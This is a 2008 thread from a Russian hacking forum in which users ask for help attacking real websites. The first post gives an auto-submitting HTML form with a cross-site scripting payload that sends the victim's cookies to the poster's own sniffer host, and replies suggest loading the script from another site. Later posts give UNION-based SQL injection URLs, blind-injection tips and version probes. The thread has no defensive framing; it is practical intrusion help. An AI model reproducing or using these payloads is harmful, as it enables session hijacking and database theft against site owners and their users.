24.08.2008, 02:08
|
|
Новичок
Регистрация: 21.08.2008
Сообщений: 9
С нами:
9326661
Репутация:
0
|
|
Вот кстати возникли проблеммы с данной процедурой получения кукисов.
нашел следующее xss на сайте.
в фотогалерее есть поле "текущая страница" (т.е. меняя значение в данном поле можно перемещаться по следующим страницам). при попытке поменять get параметры в адресной строке нарвался на фильтр
составил html код следующего вида
Код:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
</head>
<body onLoad="document.REPLIER.submit();"> <h3>сейчас вы будете перенаправлены</h3>
<form action="http://хххх.ru/index.php?page=log" method="post" name="REPLIER" ">
<input type='hidden' name='page' value=' "><script language="JavaScript">aa1 = new Image(); aa1.src="http://мой_сниффер/img.php?2222"+document.cookie;</script>'>
</form>
</body>
</html>
сниферить то сниферит но вот только без куков
т.е. в снифере остаеться ip и строка "2222"
пожалуйста подскажите почему в снифере не записываются куки и в чем моя ошибка? |
|
|
24.08.2008, 09:47
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами:
10447337
Репутация:
807
|
|
funnyNe0, скорее всего фильтруется символ "+".
|
|
|
|
24.08.2008, 10:00
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
Сообщение от freddi
funnyNe0, скорее всего фильтруется символ "+".
Тогда проше подгрузить js с другого сайта (<script src=), а там уже все сделать все, что надо.
|
|
|
|
24.08.2008, 20:06
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
есть скул. запрос:
Код:
http://www.сайт/index.php?id=42222'+union+select+1,2,3+from+information_schema.tables/*
сервер отвечает загрузкой страницы, такой же как
Код:
http://www.сайт/index.php?id=42222
пробую найти поля, которые выводятся на экран:
Код:
http://www.сайт/index.php?id=-1'+union+select+1,2,3+from+information_schema.tables/*
http://www.сайт/index.php?id=42222'+and+1=9+union+select+1,2,3+from+information_schema.tables/*
http://www.сайт/index.php?id='+union+select+1,2,3+from+information_schema.tables/*
Не получается. пишет ошибку. как ещё можно вывести на экран поля? |
|
|
|
25.08.2008, 03:21
|
|
Познающий
Регистрация: 05.08.2007
Сообщений: 30
С нами:
9876886
Репутация:
18
|
|
Сообщение от AFoST
есть скул. запрос:
Код:
http://www.сайт/index.php?id=42222'+union+select+1,2,3+from+information_schema.tables/*
сервер отвечает загрузкой страницы, такой же как
Код:
http://www.сайт/index.php?id=42222
пробую найти поля, которые выводятся на экран:
Код:
http://www.сайт/index.php?id=-1'+union+select+1,2,3+from+information_schema.tables/*
http://www.сайт/index.php?id=42222'+and+1=9+union+select+1,2,3+from+information_schema.tables/*
http://www.сайт/index.php?id='+union+select+1,2,3+from+information_schema.tables/*
Не получается. пишет ошибку. как ещё можно вывести на экран поля? попробуй -42222 поставить, или убрать кавычку..
вполне есть вариант что у твоего юзера mysql нету доступа к базе information_schema
|
|
|
|
25.08.2008, 12:01
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от sharoff
попробуй -42222 поставить, или убрать кавычку..
вполне есть вариант что у твоего юзера mysql нету доступа к базе information_schema
к информейшн.схема доступ есть. ковычку убирать и ставить "-" пробовал. =(
|
|
|
|
24.08.2008, 20:14
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами:
9457097
Репутация:
133
|
|
чет я не понимаю вопроса если честно! у тебя в скули нет полей для вывода ? если нет то только blind sql !и есче вопрос что ты пытался сделать этими запросами в базу ?
|
|
|
|
24.08.2008, 23:07
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
было такое.. попробуй посимвольным брутом
|
|
|
|
24.08.2008, 23:10
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами:
10198073
Репутация:
354
|
|
+and+substring(version(),1,1)=5
+and+substring(version(),1,1)=4
+and+substring(version(),1,1)=3
Если четвёртая или третяя не стоит заморачиваться, ИМХО.
|
|
|
|
25.08.2008, 02:07
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от ThreeD
+and+substring(version(),1,1)=5
+and+substring(version(),1,1)=4
+and+substring(version(),1,1)=3
Если четвёртая или третяя не стоит заморачиваться, ИМХО.
там 5 версия) есть варианты решения?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
